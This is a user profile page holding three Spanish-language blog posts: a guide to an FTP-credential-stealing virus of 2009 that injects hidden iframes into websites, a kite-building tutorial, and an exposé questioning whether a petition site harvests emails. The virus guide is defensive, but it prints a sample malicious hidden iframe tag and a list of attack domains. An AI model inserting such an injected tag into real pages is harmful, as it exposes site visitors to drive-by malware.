webadicto
Usuario (Reino Unido)
Introducción Si estás teniendo problemas con este virus sé que vas a leer este post con atención. He leído otros comentarios similares al respecto en taringa, hay muy poquitos y son muy breves y la información es, en generl, deficiente. Hay un virus que anda dando vueltas que opera de la siguiente manera: 1- Cuando ingresás a páginas amigas infectadas, te bajás un archivo .pdf o .swf que, aprovechando vulnerabilidades de los respectivos acrobats, busca contraseñas y accesos ftp. 2- Se conecta con tus sitios via ftp sitios y los infecta. 3- Sobreescribe los archivos index.php, index.html, y otros (gestores como joomla o wordpress son vulnerables a este ataque). Ingresa un pedacito de código que redirecciona a páginas peligrosas para seguir con el ciclo, infectando a los usuarios de tu página. El tema es que accede a todas las conexiones ftp que tengas e infecta todos los sitios que estés administrando. De modo que puede convertirse en un verdadero problema. A continuación, explicaremos cómo reconocerlo y cómo evitar y solucionar este inconveniente. Reconocimiento del virus y del iframe escondido En mi caso, mi antivirus (yo utilizaba el avira y hacía escaneos online con el nod) no lo había detectado. El problema saltó cuando el google marcó mis sitios como peligrosos. En el buscador aparece un cartel debajo del título de la página que dice "Este sitio puede dañar tu equipo." y cuando ingresamos al sitio nos dice: "Advertencia- Si visitas este sitio web, tu equipo puede resultar dañado." y nos enlaza a una página de "Navegación segura" en la que diagnostican el problema. Si esto no sucede te recomiendo usar el avast que lo encuentra (debés escanear tu máquina y los directorios de tu server), si alguien conoce otro antivirus efectivo, que lo recomiende. Dicen que el antispyware *** lo reconoce pero no estoy seguro. De todas formas no está mal agregar esta herrmienta a nuestra batería de antispywares. Si ni el google ni el antivirus les dice nada pero verifican que automáticamente se agregan líneas de código a los archivos de su sitio pueden utilizar esta herramienta: http://unmaskparasites.com/ que es muy efectiva. Ténganla en cuenta para verificar que todo está bien una vez que hayan solucionado el problema. Si están infectados, esta herramienta se lo indicará y presentará un informe similar a este: Anatomía del virus Una vez que se hizo de tus contraseñas y accesos ftp, el virus ingresa en tu hosting. Se instala presumiblemente en un archivo llamado image.php o similar y comienza a injertar líneas de código en tus archivos index.php, index.html y otros. El código que injerta puede lucir como este: <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> Los nombres de dominio pueden ser diferentes pero suelen terminar en .cn o .ru Aquí hay una lista de dominios que puede injertar aunque siempre salen nuevos: * lotultimatebet .cn * lotmachinesguide .cn * cheapslotplay .cn * homenameregistration .cn (added: 04.22.2009) * litegreatestdirect .cn (added: 04.25.2009) * playbetwager .cn (added: 04.25.2009) * nameashop .cn (added: 04.29.2009) * mainnameshop .cn (added: 04.29.2009) * superlitecarbest .cn (added: 04.29.2009) * internetnamestore .cn (added: 04.30.2009) * dotcomnameshop .cn (added: 05.02.2009) * mediahomenamemartvideo .cn (added: 05.11.2009) Diagnóstico de navegación segura Por el momento, google no detecta la mayoría de los sitios infecatados con este virus, muchos de los sitios infectados no figuran como sospechosos. Y muchos de los dominios .cn o .ru que están utilizando para atacar no están en las listas negras. No descarto que aparezcan dominios nuevos con nombres diferentes. Cuando google detecta el contenido malicioso te aparece un cartel que dice algo así como: El software malicioso se encuentra alojado en 2 dominio(s), entre los que se incluyen u0b.in/, a5i.ru/. Vulnerabilidad del Adobe Acrobat Aquí hay un reporte del análisis de un pdf infectado utilizado para ingresar el virus: http://wepawet.iseclab.org/view.php?hash=2c986e41374b0df3034d6904956c15d1&type=js El virus utiliza una vulnerabilidad del acrobat 8 o anteriores que es la siguiente: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992 “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“. De modo que, si estás utilizando el acrobat 8.1.2 o anterior, actualizalo a la versión actual, que es la 9.1. El virus descarga silenciosamente un binario malicioso (Windows executable) de una de los sitios infectados alojado, generalmente, en el mismo servidor al que el iframe direcciona. De modo que se perpetua el ciclo. De acuerdo a virus total, la detección del virus es muy baja (3/40, es decir, sólo de un 7.5%) http://www.virustotal.com/analisis/d0623c10fe16877da8827bd73ea14c09 Todo el mundo recomienda al nod pero como les dije, a mí me funcionó solamente el avast (con un amigo, también infectado, funcionó sólo el avast). ¿Cómo evitar infectarse de este y otros virus similares? 1- Hay que tener una versión de windows actualizada. En mi caso, utilizo en el windows xp sp3. 2- Tener instalado un antivirus full y hacer escaneos online periódicos con otros antivirus. 3- Utilizar algunos antispywares. En mi caso utilizo el ***, el spybot search and destroy, el adware y el spywareblaster. Además, uso el ccleaner para limpiar el registro. 4- Tener actualizado el acrobat. Aquí les dejo el link de descarga al acrobat reader 9: http://www.adobe.com/es/products/reader/ 5- No dejar ninguna contraseña guardada en la máquina. Particularmente, no debemos dejar la que nos permite ingresar via ftp a nuestro hosting. 5- Utilizar un firewall y dejarlo activado. 6- Cambiar todas nuestras contraseñas una vez por semana. Particularmente, las de acceso via ftp. Es recomendable utilizar sftp a ftp para volver a conectarnos con nuestro hosting. 7- Hacer back ups periódicos de nuestro sitio. De modo de poder restituirlo si es necesario. 8- Periódicamente chequear nuestro sitio con herramientas como unmask parasites para asegurarnos de que todo esté bien. Eliminando el virus 1- Aunque eliminemos el virus de nuestro hosting, siempre es más importante comenzar eliminando el virus de nuestra máquina. De lo contrario, el virus volverá a afectar nuestro sitio. De modo que deberíamos empezar por ingresar en nuestra PC en modo a prueba de fallos y escanear con el antivirus. Como dije antes, el avast y el *** lo encuentran. Pero lo que yo recomiendo es hacer borrón y cuenta nueva, es decir, formatear e instalar todo de vuelta. 2- Una vez que estemos seguros que ya sea escaneando, ya sea formateando, hemos limpiado nuestra máquina, debemos cambiar todas nuestras contraseñas, particularmente las que nos permiten acceder via ftp a nuestro sitio. Recomiendo NO dejarlas guardadas en la máquina y volver cambiarlas una vez por semana. Es recomendable utilizar sftp a ftp para volver a conectarnos. 3- Ahora debemos remover el código malicioso de nuestro hosting. Si el sitio tiene un tamaño decente, limpiarlo a mano es casi imposible. Y los antivirus fallan en esta tarea. De modo que recomiendo borrar todo y sustituirlo por un back up de momentos previos a la infección. Para saber si este back up está infectado, deben escanearlo con el antivirus y utilizar la herramienta que les comenté anteriormente: unmask parasites y chequear que todo esté bien. Si el back up está infectado, deben buscar uno que no lo esté. 5- Escaneen los directorios de su hosting con un antivirus para asegurse de que no quedó código sucio. 6- Si su sitio sigue marcado por google como sospechoso. Hagan una solicitud de reestablecimiento utilizando las herramientas para webmasters de google: http://www.google.com/webmasters/tools/ 7- Periódicamente chequear nuestro sitio con herramientas como unmask parasites y escanearlo con un antivirus para asegurarnos de que todo esté bien. 8- Cumple con el punto anterior (¿Cómo evitar infectarse de este y otros virus similares?) para evitar que esto te vuelva a suceder. Fuentes: Malicious “Income” IFrames from .CN Domains http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
Se vino el invierno: ¿Y si remontamos un barrilete? ¿Tenés hijos, sobrinos o nietos? ¿Te gusta pasar un rato al aire libre con ellos? Para estos días soleados y ventosos de invierno te traigo un post antiaburrimiento. Te dejo un tutorial que explica de forma simple y clara cómo hacer un barrilete . Para leerlo debes seguir el siguiente enlace: Tutorial para construir barriletes hexagonales: http://www.kiteplans.org/planos/hexag/hexag.html Y para que tu barrilete no se descontrole, te dejo a continuación un tutorial que explica de forma simple y clara cómo construir los diferentes modelos de cola: Tutorial para construir colas de barriletes http://www.kiteplans.org/planos/colas/colas.html Yo estoy construyendo el mío, planeo probarlo con una amiga y su hijita el próximo fin de semana. Cuando lo haga les cuento si vuela. Espero que pasen un rato divertido. A disfrutar de tu barrilete!!!!!!!!!! Nota para los que no son argentinos: El barrilete es conocido en otros países con los siguientes términos: cometa, estrella, volantín, papalote
Hace unos días el sitio http://www.trenparatodos.com.ar/ apareció en la vida y en las casillas de e-mail de los argentinos para informarnos, proponernos debatir y pedirnos que votemos no sin antes solicitarnos, por una causa noble, que cedamos información privada, incluido nuestro e-mail. Esta página que fue promocionada por innumerables bloggers autóctonos, incluido, por ejemplo, el célebre blog alimentado por el legendario Fabio: http://www.fabio.com.ar/verpost.php?id_noticia=2725#comments83810 y no pocos medios de comunicación locales y nacionales. Por ejemplo: - Página 12 (artículo firmado por Pino Solanas): http://www.pagina12.com.ar/diario/economia/2-99222-2008-02-20.html - La Nación: https://www.lanacion.com.ar/economia/nota.asp?nota_id=1014189 Donde dice: “Un ex ferroviario rosarino, Jorge Constestí, y su hermano Angel lanzaron una convocatoria en Internet para detener el proyecto de construcción del tren bala. A seis días de habilitado el sitio web que crearon ya son más de 200 mil las personas que aportaron su voto para llegar al millón de firmas que necesitan presentar al Congreso para que se trate el proyecto. (...) Angel, un profesional dedicado a la informática, aclaró que no se oponen al tren bala por su “modernidad” o por “competencia con el resto de los transportes”. Tampoco se ocuparon de investigar las sospechas por las continuas modificaciones presupuestarias en torno al proyecto. (...) Esta iniciativa de adhesión por Internet, en www.trenparatodos.com.ar , es avalada por la agrupación política Proyecto Sur liderada por Pino Solanas.” Y otros tantos medios de comunicación que no voy a enumerar por no aburrir. Este sitio fue aceptado tanto por la izquierda (que lo apoya y lo impulsa) como la derecha (lo apoyan hasta en el foro de seprin.com). Algo que nunca había visto antes (sí, usuarios de seprin hablando bien de un proyecto de izquierda). Así que ya todos deben estar al tanto del contenido y las buenas intenciones de este sitio. Por supuesto, muchísimos usuarios solidarizados con esas ideas accedieron a insertar sus datos amablemente (incluido su e-mail) en el formulario de la página trenparatodos con la firme convicción de estar colaborando con una juntada de firmas (cuando no es sí, son e-mails, muchachos, no firmas). Muchos contribuyeron también a difundir esta web viralmente armando cadenas para que otros ingresen y puedan hacer lo mismo. ¿Por qué me tomo el trabajo de escribir esto si este sitio es tan bueno e inocente? Por dos razones, una, hay probabilidades de que este sitio sea un CAPTURADOR DE E-MAILS, a esa conclusión llegan algunos bloggers luego de analizarlo, la segunda, EL SITIO COPIÓ EL DISEÑO DE UNA CAMPAÑA ANTERIOR DE GREANPEACE y no lo declaró hasta que recibieron quejas. Primera razón de este post, TREN PARA TODOS PUEDE SER UN CAPTURADOR DE E-MAILS: El otro día navegando por allí me encontré con la sospecha de que este sitio podía ser un CAPTURADOR DE E-MAILS. ¿Qué es un capturador? Es un sistema diseñado para captar e-mails vigentes con el fin de armar una base de datos para poder, posteriormente, enviar spam (mensajes basura como las publicidades de viagra y ese tipo de cosas) a los e-mails capturados. ¿Pruebas? En el blog de Javier Salinas se consigna lo siguiente: http://blog.salinas.com.ar/2008/05/19/otro-capturador-de-mails-validos/ “Primer paso, por Nic.ar: el registrante se llama Hernan Sanchez Cenitagoya y entre sus datos de entidad registrante figuran su dirección y su t.e. Segundo paso, por Paginasamarillas.com.ar: ingresando el código de area de Rosario y el t.e. declarado por esta persona se puede ver que el titular de la linea no coincide, ni tampoco la dirección. Tercer paso, por Google: Un solo resultado con dicho nombre y apellido y encima apunta a un foro donde se publica la información de Nic.ar Cuarto paso, por un whois, ya que el lugar donde está hosteada la página me sonaba. Resultado: Hostmar.com es un dominio registrado por Dattatec, un hosting lamentablemente reconocido por los aprietes a los que hablan mal de el y por ser extremadamente tolerante con el spam (¿cuando le conviene?) La página, que dice contar con el apoyo de ATE Rosario, un par de organizaciones estudiantiles y otro par de partidos políticos de izquierda, presenta también la adhesión del Proyecto Sur Rosario, cuyo dominio también está registrado a nombre de Hernan Sanchez Cenitagoya.” (…) "Update: Entren a la página a cualquier hora, vean el contador de firmas y hagan actualizar un par de veces. Verán como la gente vota a razón de una por segundo. Update II: Desde las 22:00 del 20/5 a las 6:31 del 21/5, 10.159 firmas, una cada 3 segundos Un usuario de ese blog, llamado LocoDelAssembly, escribe: “Que interesante que si este tal Angel (...) es un profesional de la informática no se caliente en hacer una mínima validación en los datos de entrada. Los siguientes datos son considerados válidos e incrementan el contador de firmantes: Nombre:a;Apellido:a;E-mail:a;País:Argentina;Provincia:Ciudad de Buenos Aires;Localidad:a;NºDocumento:a;Teléfono Fijo:a-a;Teléfono celular:a-a No solo aceptados sino que encima los envié reiteradas veces" LocoDelAssembly en forma privada me informa qué: "el incremento fue de cientos de unidades y no miles y que el formulario lo he enviado una cantidad muy menor a 20 veces. Tampoco me parece que el proyecto sea falso pero si dudo de la veracidad de su éxito porque el contador no me parece real (como ya fue comentado)." Javier Salinas le responde: “Desgraciadamente por falta de tiempo no me pude poner a mirar mucho, pero ya me dio mala espina que el archivo procesar_firma.php contestara “gracias por su ayuda” aunque se lo accediera en forma directa.” Conclusión: Todos estos problemas de programación indican que el sitio no es tomado en serio. Además, de acuerdo al blog de Salinas y MonikaMDQ, una usuaria de meneame que el 20 de mayo decía: “La página indica que fue creada el 14 de mayo y lleva 250.000 firmas. En 7 días, son 168 horas, 10.080 minutos, 604.800 segundos, o sea, una firma cada 2,4 segundos, una velocidad que ni Greenpeace con su campaña por la ley de bosques pudo siquiera igualar. Desde las 22:00 del 20/5 a las 6:31 del 21/5, 10.159 firmas, una cada 3 segundos.” http://meneame.net/story/otro-capturador-mails-validos-sitio-trenparatodos.com.ar Y revolviendo y revolviendo me encontré con el blog de T.ao., en el que se expone la: - Segunda razón de ser de este post, EL SITIO COPIO EL DISEÑO DE UNA CAMPAÑA ANTERIOR DE GREANPEACE, diseño realizado por Martín Tinghitella: T.ao. en su blog dice: “Si bien el Piojo (Martín Tinghitella) me dice que los éxitos también se miden por esto, la realidad es que recién comprendo lo que siente un artista cuya obra fue pirateada. Meses después de haber realizado junto al equipo New Media de Greenpeace la campaña del "millón de votos por la Ley de Bosques" que logró en solo dos meses casi 1.500.000 firmas, en su mayoría recolectadas a través de la página web de Greenpeace, y logrado la tan ansiada ley, comienzan a llegarme emails invitandome a entrar a http://www.trenparatodos.com.ar/ Si comparan este sitio con el de la Ley de Bosques encontrarán una gran similitud en el diseño, una enorme similitud en el formulario para participar y una copia textual del objetivo de la campaña y algunos textos. Sitio "Ley de Bosques" Sitio "Homenaje" Si van a la sección de "promociona esta campaña" van a ver los mismos puntos de nuestra campaña del millón y una copia exacta del texto del email que escribió el Piojo para que reenvíen a sus amigos. Sitio "Ley de Bosques" Sitio "Homenaje" Más allá de la anécdota, es interesante ver cómo una práctica exitosa de ciberactivismo de nuestra organización es retomada (Sin ninguna sutileza o referencia) por otros grupos que buscan un cambio político concreto. Y a los muchachos de Neotic (Empresa que desarrolló el sitio) les diría que quiten de la web, su slogan "Creative Business", porque casualmente la creatividad es lo que menos los caracteriza.” ¿Y qué es Neotic? Si buscan en el google se enteran que Neotic es una empresa dedicada a desarrollar webs que, inmediatemnete después de que esta información negativa comenzó a circular por Internet, retiró misteriosamente su insignia y su enlace del sitio trenparatodos. ¿Por qué habrá hecho eso? También dejó de registrarse el incremento que denuncia Javier Salinas. Ahora, y para tranquilidad de todos el sitio trenparatodos agregó una nota que afirma: “Nota: Solo requerimos la información para fines relacionados con el proyecto, no utilizaremos la información para ningún otro fin. Los campos telefónicos son opcionales. No firme más de una vez, ya que el sistema no computará su firma. Esta campaña está basada en el exitosa campaña realizada por Greenpeace para la ley de bosques.” No sé si lo que estos blogs afirman es cierto o no. Si no es cierto no sé por qué cambió la página. Posteo esta información para que ustedes saquen sus propias conclusiones y para que los incautos sepan cómo es que pueden llegar a funcionar las cosas en la red, estén atentos y no manden e-mails a sus contactos invitándolos a participar en iniciativas de organización dudosa. O por lo menos, ¡no me incluyan a mí en este tipo de cadenas!!!! Además, este post es un claro ejemplo de que los grandes medios de comunicación llenan sus páginas copiando y pegando información de internet mientras que los bloggers son los que verdaderamente hacen trabajo de investigación. A Ustedes, queridos habitantes de la bloggosfera que hacen de la red un espacio habitable (y no a los otros), les dedico estas palabras. Gracias por informarnos.